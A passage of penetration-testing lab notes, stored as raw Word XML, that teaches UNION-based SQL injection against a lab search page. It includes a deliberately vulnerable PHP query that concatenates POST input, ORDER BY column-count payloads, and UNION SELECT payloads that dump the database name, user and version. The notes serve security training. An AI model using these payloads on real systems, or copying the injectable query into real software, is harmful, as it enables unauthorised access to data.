          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId455">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">UNION</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> keyword aids exploitation because it enables the execution of an extra SELECT statement and provides the results in the same query, thus concatenating two queries into one statement.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016A7">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQLi attacks to work, we first need to satisfy two conditions:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="157"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The injected </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> query has to include the same number of columns as the original query.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="157"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The data types need to be compatible between each column.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016AA">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To demonstrate this concept, let's test a web application with the following preconfigured SQL query:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016AB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$query = "SELECT * from customers WHERE name LIKE '".$_POST["search_input"]."%'";</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016AC">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The query fetches all the records from the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">customers</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> table. It also includes the</w:t>
      </w:r>
      <w:hyperlink r:id="rId456">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId457">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">LIKE</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> keyword to search any </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">name</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> values containing our input that are followed by zero or any number of characters, as specified by the percentage (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">%</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) operator.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016AD">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can interact with the vulnerable application by browsing to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.50.16/search.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> from our Kali machine. Once the page is loaded, we can click </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SEARCH</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to retrieve all data from the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">customers</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> table.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016AE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3556000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr descr="Figure 9: Loading the Customer Search Portal" id="141" name="image157.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 9: Loading the Customer Search Portal" id="0" name="image157.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId458"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3556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AF">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Before crafting any attack strategy, we need to know the exact number of columns present in the target table. Although the above output shows that four columns are present, we should not assume based on the application layout, as there may be extra columns.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016B0">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To discover the correct number of columns, we can submit the following injected query into the search bar:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016B1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' ORDER BY 1-- //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016B2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' ORDER BY 2-- //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016B3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' ORDER BY 3-- //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016B4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016B5">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you get an error at 6, then that means it has 5 columns. This is because it gives an error once you go above the number of columns</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016B6">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The above statement orders the results by a specific column, meaning it will fail whenever the selected column does not exist. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016B7">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016B8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1562100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr descr="Figure 10: Finding the Exact Number of Columns" id="478" name="image482.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 10: Finding the Exact Number of Columns" id="0" name="image482.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId459"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1562100"/>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16B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1250"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Increasing the column value by one each time, we'll discover that the table has </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">five columns</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> since ordering by column </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">six returns </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">an error.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016BA">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now that we know there are five columns in the original SQL query, the next step is to determine which columns are displayed using the following query.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016BB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">%' UNION SELECT 'a1', 'a2', 'a3', 'a4', 'a5' -- //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016BC">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The result of the above query is displayed in the following image, which better visualizes the table's columns.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016BD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4748213" cy="2069322"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr descr="Figure 11: Displaying the Exact Number of Columns" id="213" name="image213.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 11: Displaying the Exact Number of Columns" id="0" name="image213.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId460"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4748213" cy="2069322"/>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With this information in mind, we can attempt our first attack by enumerating the current database name, user, and MySQL version.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016C0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016C1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">%' UNION SELECT database(), user(), @@version, null, null -- //</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016C2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1451"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Side note: You will see that usually the first column is reserved for ID field, so you will most likely have to put null in the first column and move all your fields one to the right, as this writeup will explain below</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016C3">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since we want to retrieve all the data from the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">customers</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> table, we'll use the percentage sign followed by a single quote to close the search parameter. Then, we begin our injected query with a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> statement that dumps the current database name, the user, and the MySQL version in the first, second, and third columns, respectively, leaving the remaining two null.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016C4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3048000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr descr="Figure 12: Enumerating the Database" id="528" name="image527.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 12: Enumerating the Database" id="0" name="image527.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId461"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3048000"/>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16C5">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After launching our attack, we'll notice that the username and the DB version are present on the last line, but the current database name is not. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016C6">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This happens because column 1 is typically reserved for the ID field consisting of an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">integer</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> data type, meaning it cannot return the string value we are requesting through the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT database()</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> statement.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016C7">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The web application explicitly omits the output from the first column because IDs are not usually useful information for end users.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016C8">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With this in mind, let's update our query by shifting all the enumerating functions to the right-most place, avoiding any type mismatches.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016C9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
